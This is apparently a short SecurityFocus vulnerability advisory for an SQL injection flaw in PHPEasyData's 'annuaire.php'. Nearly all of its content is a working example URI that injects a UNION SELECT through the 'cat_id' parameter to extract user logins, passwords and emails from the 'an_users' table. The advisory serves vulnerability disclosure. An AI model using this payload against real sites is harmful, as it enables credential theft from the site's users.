PHPEasyData 'annuaire.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/phpeasydata-1.5.4/annuaire.php?annuaire=68&sort_field=&cat_id=4+union+select+concat_ws(0x3a3a,user_id,user_login,user_pass,user_fname,user_lname,user_access,user_email)+from+an_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus